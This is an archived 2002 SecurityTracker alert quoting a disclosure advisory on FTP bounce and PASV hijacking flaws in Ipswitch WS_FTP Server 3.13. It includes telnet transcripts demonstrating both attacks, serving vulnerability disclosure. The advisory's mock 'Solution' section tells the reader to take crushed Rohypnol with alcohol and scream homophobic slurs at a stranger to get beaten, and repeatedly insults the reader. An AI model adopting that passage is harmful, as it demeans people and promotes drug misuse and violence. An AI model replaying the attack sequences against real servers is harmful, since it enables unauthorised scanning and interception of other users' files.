Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
|
|
|
|
|
|
|
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
|
|
|
|
Become a Partner and License Our Database or Notification Service
|
|
|
|
|
|
|
|
|
|
|
|
|
|
Ipswitch WS_FTP Server Allows Remote Users to Hijack Connections And Conduct Bounce Attacks Via the FTP Server
|
|
SecurityTracker Alert ID: 1005486 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Oct 25 2002
|
Impact: Host/resource access via network, User access via network
|
Exploit Included: Yes
|
Version(s): 3.13
|
Description: Two vulnerabilities were reported in the Ipswitch WS_FTP server. A remote user may be able to hijack valid FTP connections. A remote user can also attack other hosts via the FTP server.
It is reported that a remote user can attempt to hijack FTP sessions when FTP PASV mode is used. Normally, when a remote client
requests an FTP PASV connection, the FTP server will assign a specific port number to the client. If the remote user can access
the assigned port number before the remote client, the remote user can then hijack the connection.
A remote user can also employ
an "FTP bounce attack" to cause the FTP server to create a connection to any IP address on any TCP port greater than 1024. If the
target FTP server is located behind a firewall, for example, the remote user may be able to gain access to ostensibly protected
hosts.
This bounce attack method has been well known for many years and is discussed in a CERT advisory from December 1997:
http://www.cert.org/advisories/CA-1997
-27.html
Some demonstration exploit transcripts are provided in the Source Message.
The vendor has reportedly been notified.
|
Impact: A remote user can make connections to arbitrary hosts via the FTP server. This can be used to attack hosts located behind firewalls.
A
remote user can hijack PASV FTP connections, gaining access to directory listings and files from other users.
|
Solution: No solution was available at the time of this entry.
|
Vendor URL: www.ipswitch.com/support/WS_FTP-Server/patch-upgrades.html (Links to External Site)
|
Cause: Access control error, State error
|
Underlying OS: Windows (NT), Windows (2000), Windows (XP)
|
Reported By: dev-null@no-id.com
|
Message History:
None.
|
Source Message Contents
|
Date: 25 Oct 2002 14:06:46 -0000
From: dev-null@no-id.com
Subject: [VulnWatch] IPSwitch, Inc. WS_FTP Server
|
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Product: IPSwitch, Inc. WS_FTP Server
Versions: v3.13 (dated 2002.08.07), possibly others.
Severity: Medium-Hot
Author: low halo <lowhalo@hushmail.com>
Date: October 25th, 2002
Revision: 1.0
{ Overview }
WS_FTP v3.13 by IPSwitch, Inc., is vulnerable to the classic FTP bounce
attack as well as PASV connection hijacking.
{ Impact }
The FTP bounce vulnerability allows a remote attacker to cause the FTP
server to create a connection to any IP address on any TCP port greater than
1024. Thus, the attacker can scan Internet addresses anonymously along with
any internal addresses that the FTP server has access to. More information
on this vulnerability can be found here:
http://www.cert.org/advisories/CA-1997-27.html.
The PASV connection hijacking vulnerability allows a remote attacker to
intercept directory listings and file downloads from other users; file uploads
may also be spoofed. No authentication is necessary to execute this attack.
More information on this vulnerability can be found here:
http://www.kb.cert.org/vuls/id/2558.
{ Details }
This demonstrates the FTP bounce vulnerability. The internal IP address,
"192.168.1.20", is listening on port 8080, and "192.168.2.30" is dead or not
accessible via port 8080:
$ telnet x.ternal.ip.address 21
Trying x.ternal.ip.address...
Connected to x.ternal.ip.address.
Escape character is '^]'.
220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
220-Sun Jun 04 00:00:00 1989
220-27 days remaining on evaluation.
220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
USER lowhalo
331 Password required
PASS el_ach
230 user logged in
PORT 192,168,1,20,31,144
200 command successful
LIST
150 Opening ASCII data connection for directory listing
226 transfer complete
PORT 192,168,2,30,31,144
200 command successful
LIST
425 Can't open data connection.
This demonstrates the PASV connection hijacking vulnerability:
$ telnet x.x.x.x 21
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
220-lh1 X2 WS_FTP Server 3.1.3.EVAL (696969696)
220-Sun Jun 04 00:00:00 1989
220-27 days remaining on evaluation.
220 lh1 X2 WS_FTP Server 3.1.3.EVAL (969696969)
USER lowhalo
331 Password required
PASS el_ach
230 user logged in
PASV
227 Entering Passive Mode (192,168,1,1,4,23).
LIST
150 Opening ASCII data connection for directory listing
Next, from another IP address:
$ telnet x.x.x.x 1047
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
drwxr-x--- 2 lowhalo System 0 Jan 0 00:00 .
drwxr-x--- 2 lowhalo System 0 Jan 0 00:00 ..
- -rwxr-x--- 1 lowhalo System 1337 Jan 0 00:00 lh
Connection closed by foreign host.
{ Solution }
1.) Mix yourself a Long Island Iced Tea.
2.) Buy more Rohypnol from Paco on 7th & 30th ('cuz you used up the
box you bought last time to get yourself out of that chicken-
suit bind last Wednesday, remember??).
3.) While you're not looking, slip yourself two (2) crushed 100mg pills.
4.) Drink your Long Island while pretending to be flirting with someone
in a bar environment (but in fact, you're still in your lonely,
lonely apartment because you're a fucking looser and you're gonna
die alone 28 years from now).
5.) Put on those crotchless leather pants that you got in your closet.
But this time, don't wear anything underneath. Not even
underwear.
6.) Go to the local gay bar, even though you're not gay, and wait
outside 'till that warm fuzzy roofies feeling starts crawling up
your back.
7.) Go inside the bar and look for the menacing black biker guy named
Steve (Hey, how did you know his name is Steve if you're not
gay, huh??). Take the deepest breath you can and scream at the
top of your lungs every homosexual slur that you can think of
right in the guy's face.
8.) Wake up 16 hours later at the bottom of a ditch in a pool of your
own blood with that, "uh-oh, I think I forgot my jacket at the
bar" feeling.
9.) Try to figure out exactly what happened, and LAUGH YOUR ASS OFF
when you do.
10.) Die alone 28 years from now, you fucking looser.
(Yeah, so anyways, IPSwitch never got back to me after two weeks, so
there is no solution to this problem.)
{ Conclusion }
A big huge shout-out goes to HACKTIVISMO (http://www.hacktivismo.com/)!!
You guys have a lot to be proud of.
And here's a quote I'd like all those iDEFENSE research contributors to
read:
"Few men have the virtue to withstand the highest bidder."
- George Washington
low halo <lowhalo@hushmail.com>
Defender of Truth and Liberty
http://pgp.mit.edu:11371/pks/lookup?op=get&search=0x9BFD99BF
58CE 3215 226A 69ED 4D20 4044 C925 54F9 9BFD 99BF
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.0 (GNU/Linux)
iD8DBQE9uF67ySVU+Zv9mb8RAplZAJ0WhQbCfyjFWyNc8hfgIySKqFspBACeLFHb
8LkuAxTfsHywHMYA7SlCL8M=
=G5ln
-----END PGP SIGNATURE-----
--
This message has been sent via an anonymous mail relay at www.no-id.com.
|
|
Go to the Top of This SecurityTracker Archive Page
|
